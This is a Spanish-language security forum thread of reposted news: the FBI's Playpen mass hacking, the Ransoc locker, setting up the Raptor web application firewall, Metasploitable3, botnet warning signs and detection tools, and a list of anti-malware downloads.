Según informaron en Motherboard en su momento, este sistema permitió al FBI hackear más de un millar de ordenadores, pero la cosa no quedó ahí. Ahora, la transcripción de una audiencia probatoria en un caso relacionado con éste ha descubierto que en realidad el FBI fue mucho más allá.

Según dicha información, el FBI llegó a hackear más de ocho mil ordenadores en 120 países de todo el mundo, y todo ello con una sola orden judicial. "Nunca, en toda la historia de nuestra nación, hemos visto una orden judicial con un alcance tan extenso", afirma Colin Fierman, abogado defensor de algunos de los acusados en este caso.

Este hackeo masivo comenzó a raíz de la investigación que el FBI inició acerca de la web de pornografía infantil Playpen en la Dark Web. La agencia se apropió de la página, pero en lugar de cerrarla, decidió usarla como "cebo" para detener a más gente implicada. Para ello, la colocaron en un servidor del gobierno durante 15 días, pero aun así fueron incapaces de obtener las verdaderas direcciones IP de sus usuarios, puesto que éstos se conectaban vía Tor.

Fue entonces cuando el FBI decidió recurrir a medios más agresivos, e instaló un elemento de malware en el servidor que entraba dentro del ordenador de cualquier persona que visitara ciertos hilos de pornografía infantil en Playpen, y enviaba su dirección IP directamente al FBI. Así fue como se hicieron con miles de direcciones (hasta 8.000, según los últimos datos) en al menos 120 países de todo el mundo.

El hecho de que un solo magistrado pueda autorizar al FBI a hackear a ocho mil personas en 120 países es simplemente aterrador", ha comentado Christopher Soghoian, de la American Civil Liberties Union.

Con actuaciones como ésta lo cierto es que se abre un peligroso precedente. Por una parte, puede llegarse a entender que en casos tan graves como los de pornografía infantil sea necesario aplicar medidas drásticas. Por otro lado, hay que sopesar el grado de libertad de actuación que se les da a las agencias de información del gobierno, y hasta dónde pueden llegar éstas para hacer cumplir la ley, tanto dentro como fuera de Estados Unidos.

La cosa, además, no parece que vaya por buen camino. Todo apunta a que en pocas semanas se harán efectivos unos cambios legales que podrían permitir que los jueces norteamericanos autoricen el hackeo de ordenadores en masa, sin importar su ubicación en el mundo - es decir, tal y como ha sucedido con el caso Playpen -, y usar este método en casos de todo tipo, no sólo de pornografía infantil.



fuente:m.genbeta.com



#28
Noticias Informáticas / Ransoc: una amenaza convincente
Noviembre 24, 2016, 08:24:54 AM

Imagínate que, de repente, tu ordenador te muestra un mensaje perturbador: "Es el FBI. Se ha detectado contenido ilegal en su dispositivo. Será encarcelado durante 20 años y se le multará con 200 000 dólares a no ser que pague 100 dólares en bitcoins".

Dirás: "¡Ja! No tan rápido, ransomware. No me vas a sacar ni un céntimo, utilizaré una herramienta especial para eliminarte de mi PC".

Los lockers como este eran comunes entre 2012 y 2014, pero ahora atacan smartphones, dispositivos en los que más difícil lidiar con ellos, mientras que en los PC han sido los ransomware cifradores los que han heredado su lugar.

No obstante, los lockers no han desaparecido del todo de los ordenadores, sino que han evolucionado para utilizar métodos más eficientes y persuasivos. El locker descubierto recientemente, Ransoc, sirve como ejemplo de este interesante proceso de evolución.

La principal diferencia entre Ransoc y un locker habitual es su alta e incrementada habilidad para persuadir a los usuarios. El ransomware bloquea la navegación y muestra los datos personales de la víctima junto con fotos de las redes sociales. Asimismo, el malware exige cosas que parecen racionales. ¿Cómo es eso posible?

En cuanto Ransoc infecta el PC de la víctima (suele provenir de webs para "adultos"), comprueba si el disco duro tiene algún contenido ilegal como pornografía infantil o música y películas pirateadas. Ransoc también comprueba las cuentas de las víctimas en Skype, Facebook y LinkedIn. El troyano utiliza dicha información para que el correo de extorsión suene más personal.


Como resultado, las víctimas reciben notificaciones que los asustan y que parecen muy persuasivas: esta es su información personal y esta es la lista de sus acciones ilegales. Ransoc amenaza con hacer públicos los trapos sucios del usuario y, posiblemente, en sus redes sociales. Si el troyano no encuentra nada, no chantajea a la víctima lo más mínimo. Muchos pueden verlo como un tipo de justicia poética

Además, Ransoc comprueba cada 100 milisegundos si los usuarios abren las utilidades regedit, msconfig o taskmgr para detener dichos procesos, por lo que las víctimas no pueden eliminarlo del sistema.

El otro aspecto interesante de Ransoc es que los delincuentes quieren recibir el rescate mediante transferencia bancaria. Por una parte, es más fácil de comprender quién está detrás de todo el fraude y, por la otra, los delincuentes fingen ser el FBI y, en este caso, una transferencia bancaria parece más convincente que los bitcoins.

En resumen, Ransoc es un tipo de locker 2.0, una versión mejorada y actualizada del malware que fue popular hace tres años.


Hay dos grandes métodos para detener a los lockers.

1. Mantener la calma y no tragarte todos estos trucos de ingeniería social. No son de las fuerzas policiales por mucho que lo digan: solo son ciberdelincuentes que han hecho que su malware sea algo más avanzado.

2. Utiliza una solución de seguridad de confianza en tus dispositivos. Kaspersky Internet Security detecta Ransoc y lo detiene antes de que recopile información y de que intente chantajearte. Si tu dispositivo se infecta con este troyano, igualmente puedes eliminarlo con la ayuda de Kaspersky Internet Security.

Si quieres saber más sobre los diferentes tipos de ransomware y cómo oponerte a ellos, No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.



fuente:blog.kaspersky.es



Un saludo biaaaches :)
#29
Hacking / Raptor waf,firewall de aplicaciones web
Noviembre 23, 2016, 04:58:08 PM
RAPTOR WAF



Un firewall de aplicaciones web (WAF) es un firewall que supervisa seguridad web, filtra o bloquea el tráfico HTTP hacia y desde una aplicación Web.Un WAF también es capaz de detectar y prevenir nuevos ataques desconocidos al observar patrones desconocidos en los datos de tráfico. Raptor WAF es un firewall de aplicaciones web hecho en C, que usa DFA para ayudar en seguridad web y bloquear SQL Inyección, Cross Site Scripting (XSS) y PathTraversal.

Es esencialmente un firewall de aplicación web simple hecho en C, usando el principio KISS, haciendo poll utilizando la función select (), no es mejor que epoll () o kqueue () de BSD, pero es portátil.

Caracteristicas

Según los expertos de seguridad web de iicybersecurity, WAF como Raptor puede ser utilizado por PYMES para implementar seguridad web. Es ampliamente utilizado hoy en día para detectar y defenderse contra la mayoría de las inyecciones de SQL, ataques contra seguridad web y ataques XSS.

-Bloquear ataques contra seguridad web como de XSS, Inyección de SQL y path traversal
-Lista negra IPs para bloquear usuarios usando config / blacklist ip.txt
-Soporta IPv6 e IPv4 para la comunicación

Veamos un escenario de ejemplo para montar en unos sencillos pasos:


Primero descargamos el repositorio de Raptor y lo instalamos para montar nuestro WAF:

Código: text
git clone https://github.com/CoolerVoid/raptor_waf
cd raptor_waf && make


Ahora indicamos la IP del servidor web a proteger, la 192.168.11.123:

Código: text
bin/Raptor -h 192.168.11.123 dirección -p 80 -r 8886 -w 4 -o logAtaques.txt


Ahora Raptor protege el servidor web y todos los clientes tendrán que "atacar" a -http://servidor_waf:8886-. Por supuesto podemos hacer el NAT que queramos en el firewall externo de cara a publicarlo en Internet.



fuente:No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



Un saludo biaaaches :)
#30
Noticias Informáticas / Buscando a rusos descontentos
Noviembre 23, 2016, 01:05:09 PM
EE.UU. gasta 700.000 dólares en vigilar a activistas en la Red



Organizaciones estadounidenses estudiarán las cuentas de Twitter y otras redes sociales de activistas y organizaciones públicas de Rusia, Egipto y Turquía para identificar cómo se puede influir en la opinión pública.[/b]

Tres organizaciones analíticas recibirán 700.000 dólares del Gobierno de EE.UU. por observar las cuentas de internautas rusos, egipcios y turcos, según el sitio web gubernamental estadounidense sobre aportaciones públicas. En particular, expertos de la Universidad Cornell, la Universidad Johns Hopkins y la empresa Morningside Analytics investigarán el efecto del 'contagio social', según la descripción del subsidio.

El estudio prevé una comprobación del modelo de 'contagio de masas críticas' mediante las redes sociales. Los científicos identificarán a los individuos movilizados en un contagio social elaborando el perfil de un activista típico y determinando el grado de tensión que experimenta una sociedad.

De acuerdo con los datos recibidos, los expertos analizarán cuándo esos contagios llegan a un punto crítico y provocan movilizaciones masivas y protestas en la vida real. El documento especifica que para lograr los objetivos del estudio se necesitan nuevos enfoques que permitirían "extraer de los datos de Twitter información sobre emociones y opiniones positivas y negativas sobre temas particulares".

"Métodos ideológicos" para luchar contra Rusia

Según el politólogo ruso Alexánder Asafov, los estadounidenses están buscando personas que puedan promover ideas occidentales y desarrollar "métodos ideológicos" para luchar contra Rusia. Asafov ha explicado que "en primer lugar estudiarán las cuentas de los líderes de opinión", es decir, los que generan mensajes ampliamente difundidos por otros usuarios. El académico ha asegurado que esos líderes no deben ser opositores en el sentido estricto de la palabra, ya que "lo más importante es que tengan muchos seguidores".

Asafov apunta que los centros científicos de EE.UU. que han estado en modo de espera desde el colapso de la Unión Soviética en 1991 recientemente han intensificado sus actividades. "Ahora estas organizaciones vuelven a aparecer, se desarrollan nuevos programas universitarios para estudiar legado de los activistas rusos", ha asegurado.



fuente:No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



Un saludo biaaaches :)
#31


Un nuevo archivo infeccioso, que se distribuye en forma de vídeo a través de iMessage, provoca el bloqueo inmediato de cualquier iPhone.

Una nueva amenaza se cierne sobre el iPhone, en esta ocasión en forma de vídeo. Así, varios usuarios de Reddit han descubierto recientemente un vídeo de apenas cinco segundos de duración que, en caso de ser visionado, provoca el inmediato bloqueo de todas las funcionalidades del smartphone.

El usuario no tiene que realizar ninguna acción concreta para ser infectado: basta con que haga click en el archivo MP4 malicioso para que el código comience a hacer de las suyas. Para dotar de más gravedad a la situación, este virus parece ser común a las distintas versiones de iOS, incluyendo a aquellos terminales actualizados a iOS 10.1 o con versiones beta de iOS 10.2.

El vídeo se distribuye aparentemente a través de la aplicación iMessage. Una vez que el usuario pulsa sobre él, se muestra el archivo con el reproductor de vídeos predeterminado. Apenas 10 segundos después de ver el contenido, el teléfono queda completamente inutilizable, siendo imposible acceder a cualquier aplicación instalada o a nuestros documentos e imágenes.

video: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta




Fuente:No tienes permitido ver los links. Registrarse o Entrar a mi cuenta




"ayudenme a modificar el post para que se vea el video directamente aqui, que cuando pongo la etiqueta iframe no me deja publicar el post y no encuentro la manera de poder ponerlo para que se vea directamente, gracias :)"



Un saludo biaaaches :)
#32
Noticias Informáticas / Metasploitable3
Noviembre 22, 2016, 09:09:17 AM

Metasploitable es un sistema operativo contenido en una máquina virtual preparado específicamente para ser vulnerable a diferentes tipos de ataques. Ahora, el equipo de desarrollo de Metasploitable ha lanzado la versión Metasploitable3 para permitir a los estudiantes y profesionales de seguridad informática probar sus herramientas en un entorno controlado.

Metasploitable3 es la última versión del popular proyecto, que nos permite simular ataques a sistemas reales utilizando en gran medida Metasploit, el conocido framework para realizar pentesting de sistemas. Metasploit es ampliamente utilizado en la industria de la seguridad informática debido a su eficiencia, nos permite una gran configurabilidad de los módulos, desarrollar nuevos módulos por nosotros mismos, y también para realizar diferentes tipos de pruebas de software. Además, como Metasploit es ampliamente utilizado, también lo suelen utilizar los ingenieros de preventa para demostrar que sus productos son seguros, así como en los retos CTF.

La última versión de Metasploitable data del año 2012, esta nueva versión Metasploitable3 está construida para ser vulnerable desde cero, y tiene unas características muy interesantes que las versiones anteriores no tenían.

PRINCIPALES CARACTERÍSTICAS DE METASPLOITABLE3 DE CÓDIGO ABIERTO, Y CON DESARROLLO CONTINUADO

Esta nueva versión de Metasploitable es de código abierto, los desarrolladores se dieron cuenta que si querían que toda la comunidad "jugara" con este sistema, también podrían influir y contribuir con el proyecto. Por este motivo, esta nueva versión está disponible de manera gratuita y libre en el repositorio de Metasploitable3 en GitHub. Ahora, al tener un desarrollo continuado, no tenemos simplemente la máquina virtual VirtualBox para descargar, sino que nos tendremos que descargar e instalar en nuestro sistema operativo real software adicional.

Los requisitos de Metasploitable3 son que necesita Packer, Vagrant, Vagrant Reload Plugin y por último, VirtualBox para simular el sistema operativo. En el proyecto de Metasploitable3 en GitHub tenéis las instrucciones para la puesta en marcha. Próximamente también se portará a VMware para poder utilizar este software de virtualización.


MÁS DIFICULTAD PARA EXPLOTAR VULNERABILIDADES

En la versión Metasploitable2 había varias vulnerabilidades que simplemente lanzando un exploit ya teníamos privilegios de root en el sistema operativo. Con Metasploitable3 la dificultad es mayor, no todas las vulnerabilidades en Metasploitable3 se pueden explotar con un simple exploit de Metasploit, sino que tendremos que utilizar varios. Además, también se ha configurado que si un servicio se logra explotar con un único exploit, obtengamos una shell sin permisos de root, para dificultar el proceso y aprender cómo hacerlo. Además, tenemos la opción de desactivar el cortafuegos incorporado, para facilitar aún más este proceso.


INCORPORACIÓN DE "BANDERAS", SIMULANDO DATOS CORPORATIVOS

Los desarrolladores han incorporado una serie de "banderas", simulando los datos corporativos, de esta forma, si capturamos una bandera será similar a datos que hayamos podido robar. Conseguir estas banderas simularía el trabajo post-explotación y puede requerir el conocimiento de técnicas de ingeniería inversa.

METASPLOITABLE3 ES EXTENSIBLE

En la vida real, cuando vulneramos una máquina, además de verificar toda la información que haya en ella, también la podemos usar para pivotar a otra máquina dentro de la red corporativa. El objetivo de los desarrolladores de Metasploitable es crear una red de máquinas virtuales para realizar pentesting con diferentes tipos de vulnerabilidades, de esta forma, simularán un entorno real.


Actualmente Metasploitable3 está basado en Windows, pero próximamente estará basado también en Linux con el objetivo de probar módulos de Metasploit en este sistema operativo.

Os recomendamos visitar Metasploitable3 en GitHub donde encontraréis toda la información necesaria para la puesta en marcha del sistema.



Fuente:No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



Un saludo biaaaches :)
#33
Las botnets son un peligro cada vez más importante. Últimamente están intentando conquistar el Internet de las Cosas para realizar ataques que tumben importantes servicios o dejen sin conexión a todo un país. Pero los más comunes siguen siendo los que infectan tu ordenador para convertirlo en un zombie al servicio del operador de la red de bots.

Ante el cada vez mayor número de noticias que hace referencia a este tipo de ataques, puede que tengas miedo o la sospecha de que tu ordenador esté siendo utilizado por algún cracker para realizar ataques. Por eso, hoy vamos a darte una serie de consejos y herramientas para que puedas saber si tu PC forma parte o no de una botnet.

Algunos síntomas a tener en cuenta


Pero antes de entrar a utilizar ninguna herramienta, el primer paso para detectar que algo va mal es analizar el comportamiento de tu equipo. Hay determinados síntomas que pueden apuntar a que formas parte de una botnet sin saberlo. La mayoría de ellos no tienen por que deberse únicamente a eso, pero detectarlos podría ser indicativo de que algo va mal en tu PC, y siempre merece la pena que investigues este tipo de comportamientos.

-Tu PC nunca se apaga adecuadamente o tarda más de la cuenta. Esto perfectamente puede deberse más a un fallo de hardware, del propio sistema operativo o de un virus común. Aún así, puede ser un indicativo de que hay ciertos procesos funcionando que impidan que se apague correctamente, por lo que siempre es un síntoma a tener en cuenta.

-Tus contactos reciben correos que nunca enviaste. Una de las finalidades clásicas por la que algunos agentes utilizan botnets es la de difundir spam, virus, software espía y fraude. Por eso, si algún amigo o familiar dice que ha recibido correo tuyo que no has enviado cabe la posibilidad de que estés en mano de alguna de estas redes.

-Empieza a salirte spam por todas partes. Aunque por lo general este es un síntoma de que has sido infectado por uno de los tipos de malware más comunes de la red, también puede ser que hayas sido captado por una botnet y que de paso su responsable esté enviándote todo tipo de spam.

-Los ventiladores trabajan más cuando el PC está en reposo. Uno de los métodos mediante el que las botnets evitan ser detectadas es activándose cuando no estamos utilizando el ordenador. Por eso, el que de repente los ventiladores empiecen a funcionar más de la cuenta cuando está en reposo puede sugerir que hay procesos funcionando en segundo plano. También puede ser que Windows esté haciendo actualizaciones o que haya mucho polvo en ellos, o sea que primero descartemos estas dos opciones.

-Tu disco duro empieza a trabajar intensamente sin razón.
Si ni estás utilizando el PC ni Windows no está haciendo ninguna actualización y de repente el disco duro empieza a funcionar a toda velocidad quizá deberías preocuparte.

-Ni Windows ni tu antivirus se actualizan correctamente. Si ni Windows Update ni las actualizaciones de tu antivirus o programa de ordenador funcionan es síntoma de que algo no va bien. Sea un malware convencional o una botnet lo que lo esté causando, desde luego es algo que tenemos que investigar.

-Programas con nombres sospechosos en el administrador de tareas. Si pulsas Ctrl + Alt + Suprimir para lanzar el administrador de tareas, y en él ves que hay programas con nombres muy extraños consumiéndote recursos puede ser indicativo de que hay algo que has instalado sin querer, y podría ser peligroso. Es especialmente alarmante si su presencia hace que otros programas no funcionen correctamente o vayan más lentos de lo que deberían.

-Internet te funciona inusualmente lento. Si tienes una buena conexión pero de repente todo empieza a ir lento es porque algo está utilizando la conexión de tu ordenador. Puede ser por una actualización de sistema o por un programa de descarga, pero si no hay nada de ello activo y al hacer un test de velocidad ves que todo parece ir bien, posiblemente alguien se esté aprovechando de tu equipo.

-Internet tiene picos inexplicables de actividad. Si al analizar el uso de red de tu equipo (en la pestaña de rendimiento del administrador de tareas puedes mirarlo) preocupado por el punto anterior ves que que hay picos sospechoso en periodos en los que no estás realizando subidas ni descargas también tendrías que investigar más a fondo.

Cómo saber si formamos parte de una botnet

Si has detectado algunos de los síntomas de la lista de arriba, o si simplemente tienes curiosidad y quieres quitarte la preocupación de la cabeza, tienes a tu disposición varias herramientas que te ayudarán a saber si formas parte de una botnet. Algunas ya las mencionó nuestra compañera Águeda en su descripción de las botnets, pero también hay otras que también deberías tener en cuenta. Vamos a repasar las más importantes.

Servicios AntiBotnet de la OSI y el INCIBE


La Oficina de Seguridad del Internauta (OSI) guarda un registro de todas las IPs españolas que se haya detectado que formaron parte de algún incidente de seguridad relacionado con botnets. Gracias a este registro han creado el servicio AntiBotnet, una web en la que, desde tu propio ordenador y dándole sólo a un botón, podrás saber si tu IP se ha visto afectada.

Verás que en la web hay dos botones. El Chequea tu conexión de la derecha es el del servicio online del que te acabamos de hablar, mientras que el de la izquierda, llamado Consulta tu código, es otro servicio en fase piloto que están probando junto a Telefónica. Cuando esté totalmente operativo, la operadora que detecte que tu IP ha formado parte de un ataque botnet te enviará un código que, al introducirlo en la web, te dirá cual es la amenaza o el nombre de la botnet.

El Instituto Nacional de Ciberseguridad (INCIBE) también recopila información que permite conocer la existencia de ordenadores que forman parten de una botnet. En este caso lo que ofrecen no es un programa en sí, sino una API pública para que la empresa que lo desee inserte la herramienta en sus servidores para realizar el control.

Microsoft Safety Scanner


Más allá de las soluciones locales de cada gobierno, en la red también puedes encontrar otras herramientas para detectar cuándo tu PC forma parte de botnets. Algunas, de hecho, son genéricas como el Safety Scanner de Microsoft, una aplicación para detectar virus, spyware y muchas otras amenazas no deseadas.

Es una herramienta gratuita que contiene las firmas necesarias para detectar algunas de las botnets más conocidas. Con sólo instalarla y ejecutarla te llevará directamente a un menú en el que elegir si hacer un escaneo rápido de algunos minutos o uno a fondo de varias horas de tu sistema. Al final emite un informe con el estado del equipo.

Bot Revolt


Bot Revolt es un programa especialmente diseñado para detectar botnets que analiza las comunicaciones entrantes de tu equipo y reconoce los accesos sospechosos o no autorizados. También controla cada instalador que utilizas para que no te cuelen malware y analiza constantemente tu registro, por lo que además de encontrar peligros trata de prevenirte contra ellos.

El programa está diseñado para funcionar como una capa extra de seguridad que no entre en conflicto con tu antivirus. Como es de esperar, además de su vigilancia pasiva de tu equipo también tiene una herramienta de análisis para buscar malware, spyware, spam, mineros no autorizados de bitcoins y botnets.

RUBotted


RUBotted, desarrollado por la empresa Trend Micro, es un programa freeware con las firmas digitales de algunas de las botnets más populares de la red, aunque también es capaz de detectar y descubrir otras desconocidas. Se trata de una capa de protección extra que se ejecutará en segundo plano atenta a cualquier amenaza.

El programa también tiene algunos complementos para mejorar su protección, el más importante de ellos una herramienta llamada HouseCall. Se trata básicamente de lo que le falta a la principal, un programa capaz de escanear tu PC en busca de viruses, troyanos y spyware.

Herramientas de empresas de antivirus

No todo van a ser programas alternativos de desarrolladores más o menos conocidos, las grandes empresas de seguridad online también tienen sus propias herramientas de detección. Por un lado tenemos el Constant Guard de XFINITY , especialmente diseñado para evitar infecciones por bots. También tenemos otras alternativas como el Virus Removal Tool de Kaspersky o el Norton Power Eraser, ambas herramientas que buscan todo tipo de peligros en el PC.

En cualquier caso, si eres un obseso de la seguridad y no te terminas de fiar de estas soluciones, la mejor solución es también la más radical, la de simplemente formatear tu ordenador e instalar el sistema operativo desde cero. Eso sí, si vas a recurrir a ello asegúrate antes de haber hecho una copia de seguridad de tus archivos, fotografías etcétera.



fuente:genbeta.com



Un saludo :)
#34
Buenas gente me he encontrado con este post en el foro elhacker y me ha parecido oportuno compartirlo con vosotros quizas a alguno le sirva :)

Guía rápida para la descarga de herramientas gratuitas para la seguridad y desinfección de malware.
Clasificada por categorías con descarga directa de los programas.

Herramientas que generan log de reporte para subir al foro:

Hijackthis:
- Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- D.Directa: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

OTL:
- Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- D.Directa: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta | No tienes permitido ver los links. Registrarse o Entrar a mi cuenta | No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- Tutorial: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

SysInspector:
- Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- D.Directa (32 bits): No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- D.Directa (64 bits): No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- Tutorial: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Optimización y limpieza:

CCleaner:
- Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- D.Directa: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Glary Utilities:
- Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- D.Directa: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- Faq: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Windows Repair (All in One):
- Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- D.Directa: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- Portable: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Procesos (Administrador de tareas):

Process Explorer:
- Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- D.Directa: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Process Hacker:
- Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- D.Directa: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- Portable: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Procesos varios:

Autoruns: (Visualiza y desactiva programas que inician con Windows)
- Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- D.Directa: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

WhatsInStartup: (Visualiza y desactiva programas que inician con Windows)
- Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- D.Directa: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Unlocker: Desbloquea/elimina procesos en uso (destildar la instalación de la "toolbar") La descarga  de la versión portable se realizará desde los servidores de BrotherSoft.
- Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- D.Directa (32 y 64 bits): No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- Portable: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

FileAssassin: Desbloquea/elimina procesos en uso.
- Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- D.Directa: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- Portable: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Anti-Exploit:

Malwarebytes Anti-Exploit:
- Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- D.Directa: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- Soporte (foro): No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Sistema de archivos oculto por malware "Olmasco":

Hidden File System Reader (desde consola): Detecta procesos ocultos.
- Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- D.Directa: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Antivirus:

AVG:
- Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- D.Directa: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Avira Antivir:
- Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- D.Directa: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Panda Cloud:
- Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- D.Directa: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Antivirus portables:

Immunet Protect:
- Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- D.Directa: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Comodo Cloud Scanner:
- Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- D.Directa: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

McAfee Stinger:
- Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- D.Directa (x32): No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- D.Directa (x64): No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- Guía: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Clamwin:
- Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- Descarga: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- D.Directa: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Firewall:

Zone Alarm:
- Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- D.Directa: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Comodo Firewall:
- Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- D.Directa: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Suites completas (integran antivirus + cortafuegos):

Zone Alarm:
- Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- D.Directa: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Agnitum Outpost Seucurity Suite:
- Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- D.Directa (32 bits): No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- D.Directa (64 bits): No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Antispyware:

Malwarebytes antimalware:
- Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- D.Directa: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Hitman Pro:
- Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- D.Directa (32 bits): No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- D.Directa (64 bits): No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- Guía pdf: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Superantispyware:
- Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- D.Directa: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- Portable Scanner: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

AdwCleaner:
- Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- D.Directa: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- Guía: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Spybot Search & Destroy:
- Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- D.Directa: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Microsoft Safety Scanner: Antispyware
Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
D.Directa (x32): No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
D.Directa (x64): No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Junkware Removal Tool (elimina toolbars):
- Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- Descarga: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Faq: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Removal tool (elimina malware genérico):

Kaspersky Virus Removal Tool:
- Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- D.Directa: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
             No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Avira Antivir Removal Tool:
- Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- D.Directa: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- Guía: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

F-Secure Easy Clean:
- Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- D.Directa: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Norman Malware Cleaner:
-Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-D.Directa: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Emsisoft Emergency Kit:
-Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-D.Directa: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Antirootkit:

Gmer:
- Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- D.Directa: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

TDSSKiller:
- Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- D.Directa: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Bitdefender Rootkit Remover:
- Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- D.Directa (32 bits): No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- D.Directa (64 bits): No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- FAQ: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Malwarebytes Anti-Rootkit:
Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
D.Directa: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Rootkit Revealer:
- Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- D.Directa: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

SpyDLLRemover:
- Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- D.Directa: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Mcafee-avert:
- Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- D.Directa: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
                   No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
